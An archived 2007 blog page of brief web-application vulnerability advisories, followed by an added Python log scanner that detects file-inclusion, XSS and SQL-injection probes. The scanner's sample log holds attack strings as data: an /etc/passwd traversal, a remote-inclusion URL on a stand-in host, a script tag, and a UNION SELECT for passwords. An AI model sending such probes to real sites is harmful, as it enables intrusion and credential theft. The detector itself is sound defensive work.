Archive for October, 2007

Drupal Token Module Script Insertion Vulnerability

October 23rd, 2007

Application: Drupal
Affected Version: Drupal Token 4.x / 5.x
Vendor’s URL: Module download site
Bug Type: Cross Site Scripting.
Risk Level: Low

Solution:
Update to version 4.7.x-1.5 or 5.x-1.9, or to the latest version.

Cross Site Scripting

Artmedic CMS ‘page’ Local File Inclusion

October 23rd, 2007

Application: Artmedic CMS
Affected Version: Artmedic CMS 3.x
Vendor’s URL: Application download site
Bug Type: Exposure of system and sensitive information.
Risk Level: Critical

Solution:
Edit the source code or contact the developer.

File Inclusion

RunCms newbb_plus Vulnerability

October 23rd, 2007

Application: RunCms
Affected Version: RunCms 1.5.2
Vendor’s URL: Application download site
Bug Type: Not disclosed (an unspecified error was detected).
Risk Level: Critical

Solution:
Update to version 1.5.3 or higher.

Vulnerabilities

LiveAlbum ‘livealbum_dir’ File Inclusion Vulnerability

October 23rd, 2007

Application: LiveAlbum
Affected Version: LiveAlbum 0.9.1
Vendor’s URL: Application download site
Bug Type: Exposure of system and sensitive information.
Risk Level: Critical

Solution:
Edit the source code or contact the developer.

File Inclusion

Stuffed Tracker ‘GLink’ Cross-Site Scripting Vulnerability

October 23rd, 2007

Application: Stuffed Tracker
Affected Version: Stuffed Tracker 2.x
Vendor’s URL: Application download site
Bug Type: Cross Site Scripting.
Risk Level: Low

Solution:
Edit the source code or contact the developer.

Cross Site Scripting

Minki Cross-Site Scripting Vulnerability

October 23rd, 2007

Application: Minki
Affected Version: Minki 1.x
Vendor’s URL: Application download site
Bug Type: Cross Site Scripting.
Risk Level: Low

Solution:
Edit the source code or contact the developer.

Cross Site Scripting

DbList ‘dblisttest.asp’ Multiple Cross-Site Scripting

October 23rd, 2007

Application: DbList
Affected Version: DbList 8.x
Vendor’s URL: Application download site
Bug Type: Cross Site Scripting.
Risk Level: Critical

Solution:
Edit the source code or contact the developer.

Cross Site Scripting

DRBGuestbook ‘action’ Cross-Site Scripting Vulnerability

October 23rd, 2007

Application: DRBGuestbook
Affected Version: DRBGuestbook 1.x
Vendor’s URL: Application download site
Bug Type: Cross Site Scripting.
Risk Level: Low

Solution:
Update to version 1.1.14 or later.

Cross Site Scripting

Drupal Project Issue Tracking Module Subscription Form Script Insertion

October 23rd, 2007

Application: Drupal
Affected Version: Drupal Project Issue Tracking Module 4.x / 5.x
Vendor’s URL: Module download site
Bug Type: Cross Site Scripting.
Risk Level: Low

Solution:
Update to version 4.7.x-1.5, 4.7.x-2.5, or 5.x-1.1.

Cross Site Scripting

Original Photo Gallery ‘exif_prog’ Arbitrary Command Execution

October 23rd, 2007

Application: Original Photo Gallery
Affected Version: Original Photo Gallery 0.11.2 and prior versions
Vendor’s URL: Application download site
Bug Type: Remote arbitrary command execution (system access).
Risk Level: Critical

Solution:
Update to version 0.11.3.

Access Bypass, Remote Command Execution

PHP-Nuke Dance Music Module Local File Inclusion

October 23rd, 2007

Application: PHP-Nuke
Affected Version: PHP-Nuke Dance Music Module
Vendor’s URL: Module download site
Bug Type: Exposure of system and sensitive information.
Risk Level: Critical

Solution:
Edit the source code or contact module developer.

File Inclusion

SimpGB Multiple Vulnerabilities

October 22nd, 2007

Application: SimpGB
Affected Version: SimpGB 1.x
Vendor’s URL: Application download site
Bug Type: Cross Site Scripting, Security Bypass and Exposure of sensitive information.
Risk Level: High

Solution:
Update to the latest version.

Access Bypass, Cross Site Scripting

Simple PHP Blog XSS and File Upload Vulnerabilities

October 21st, 2007

Application: Simple PHP Blog
Affected Version: Simple PHP Blog 0.x
Vendor’s URL: Application download site
Bug Type: Cross Site Scripting and file upload.
Risk Level: Critical

Solution:
Update to version 0.5.1.

Cross Site Scripting

phpBB2 Plus ‘phpbb_root_path’ Multiple File Inclusion

October 21st, 2007

Application: phpBB2
Affected Version: phpBB2 Plus 1.x
Vendor’s URL: Application download site
Bug Type: Exposure of system and sensitive information.
Risk Level: High

Solution:
Update to version 1.53a.

File Inclusion

Wordsmith File Inclusion

October 21st, 2007

Application: Wordsmith
Affected Version: Wordsmith 1.x
Vendor’s URL: Application download site
Bug Type: Exposure of system and sensitive information.
Risk Level: High

Solution:
Edit the source code or contact the developer.

File Inclusion

CMS Made Simple Multiple Vulnerabilities

October 21st, 2007

Application: CMS Made Simple
Affected Version: CMS Made Simple 1.x
Vendor’s URL: Application download site
Bug Type: Exposure of system information and Cross Site Scripting
Risk Level: High

Solution:
Update to version 1.1.4.1.

Access Bypass, Cross Site Scripting

PHP-Nuke Nuke Mobile Entertainment Module Local File Inclusion

October 21st, 2007

Application: PHP-Nuke
Affected Version: PHP-Nuke Nuke Mobile Entertainment Module
Vendor’s URL: Module download site
Bug Type: Exposure of system and sensitive information.
Risk Level: Low

Solution:
Edit the source code or contact the developer.

File Inclusion

PhpGedView Multiple XSS Vulnerabilities

October 21st, 2007

Application: PhpGedView
Affected Version: PhpGedView 4.x
Vendor’s URL: Application download site
Bug Type: Cross Site Scripting
Risk Level: Low

Solution:
Edit the source code or contact the developer.

Cross Site Scripting

Phormer Multiple Cross Site Scripting

October 21st, 2007

Application: Phormer
Affected Version: Phormer 3.x
Vendor’s URL: Application download site
Bug Type: Cross Site Scripting
Risk Level: Low

Solution:
Edit the source code or contact the developer.

Cross Site Scripting

OneCMS ‘abc’ SQL Injection

October 21st, 2007

Application: OneCMS
Affected Version: OneCMS 2.x
Vendor’s URL: Application download site
Bug Type: SQL Injection
Risk Level: Critical

Solution:
Edit the source code or contact the developer.

SQL Injection
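Most entries in this month's archive fall into three classes: file inclusion through a path-like parameter (Artmedic CMS 'page', LiveAlbum 'livealbum_dir', phpBB2 Plus 'phpbb_root_path'), cross-site scripting through a reflected parameter (DRBGuestbook 'action'), and SQL injection (OneCMS 'abc'). The following is an added example, not code from any of the advisories or the affected projects: a small access-log scanner that flags probes of these three classes on those parameter names. The log lines are constructed for the example, the IP addresses are documentation ranges, and the signatures are a generic starting point rather than the advisories' own proof-of-concept requests.

```python
"""Flag file-inclusion, XSS and SQL-injection probes in an access log.

Added illustration for the October 2007 advisory classes above. The
parameter names come from the advisory titles; every log line below is
constructed for this example and is not real traffic.
"""
import re
from collections import Counter
from urllib.parse import parse_qs, unquote, urlsplit

# Constructed sample lines in Apache "combined" log format (not real traffic).
SAMPLE_LOG = """\
203.0.113.5 - - [23/Oct/2007:10:01:02 +0000] "GET /index.php?page=home HTTP/1.1" 200 512 "-" "Mozilla/5.0"
203.0.113.5 - - [23/Oct/2007:10:01:09 +0000] "GET /index.php?page=../../../../etc/passwd%00 HTTP/1.1" 200 1844 "-" "Mozilla/5.0"
198.51.100.7 - - [23/Oct/2007:10:02:15 +0000] "GET /common.php?phpbb_root_path=http://203.0.113.9/x.txt? HTTP/1.1" 200 77 "-" "curl/7.16"
198.51.100.7 - - [23/Oct/2007:10:03:40 +0000] "GET /guestbook.php?action=%3Cscript%3Ealert(1)%3C/script%3E HTTP/1.1" 200 902 "-" "Mozilla/5.0"
192.0.2.44 - - [23/Oct/2007:10:04:01 +0000] "GET /index.php?abc=1'%20UNION%20SELECT%20username,password%20FROM%20users-- HTTP/1.1" 200 2201 "-" "Mozilla/5.0"
192.0.2.44 - - [23/Oct/2007:10:05:00 +0000] "GET /gallery.php?livealbum_dir=albums/2007 HTTP/1.1" 200 400 "-" "Mozilla/5.0"
"""

# Just enough of the combined-log line to recover client, time and request path.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<path>\S+) \S+" (?P<status>\d{3})'
)

# One signature per vulnerability class, matched against the decoded parameter
# value. file_inclusion covers directory traversal (local inclusion), the NUL
# byte used in 2007-era PHP to cut off an appended suffix, and a scheme prefix
# (remote inclusion). These are deliberately narrow; a real deployment tunes them.
SIGNATURES = {
    "file_inclusion": re.compile(r'(\.\./|\.\.\\|\x00|^[a-z]+://)', re.I),
    "xss": re.compile(r'(<script|javascript:|onerror\s*=|onload\s*=)', re.I),
    "sql_injection": re.compile(r"('\s*(or|and)\s+|union\s+select|--\s*$|/\*)", re.I),
}


def classify_value(value: str) -> list:
    """Return the classes whose signature matches the (re-)decoded value.

    parse_qs already decodes one layer of percent-encoding; decoding again
    here catches the common double-encoding trick (e.g. %252e%252e%252f).
    """
    decoded = unquote(value)
    return [name for name, rx in SIGNATURES.items() if rx.search(decoded)]


def scan_log(text: str) -> list:
    """Parse each log line and emit one finding per (parameter, class) hit."""
    findings = []
    for line in text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue  # skip lines that are not in combined-log format
        query = urlsplit(m["path"]).query
        for param, values in parse_qs(query, keep_blank_values=True).items():
            for value in values:
                for cls in classify_value(value):
                    findings.append({
                        "ip": m["ip"],
                        "ts": m["ts"],
                        "param": param,
                        "value": value,
                        "class": cls,
                    })
    return findings


def summarize(findings: list) -> dict:
    """Count findings per vulnerability class."""
    return dict(Counter(f["class"] for f in findings))


if __name__ == "__main__":
    hits = scan_log(SAMPLE_LOG)
    for h in hits:
        print(f'{h["ts"]} {h["ip"]} {h["class"]:15} {h["param"]}={h["value"]!r}')
    print(summarize(hits))
```

Run against the constructed sample it flags four of the six requests: the traversal-plus-NUL probe on 'page', the remote URL in 'phpbb_root_path', the script tag in 'action' and the UNION query in 'abc'; the two benign requests ('page=home', 'livealbum_dir=albums/2007') are left alone. Because parse_qs decodes once and classify_value decodes again, a double-encoded traversal is still caught; the price is that a legitimately percent-encoded literal is decoded twice, which is acceptable for a detector but would not be for the application's own input handling.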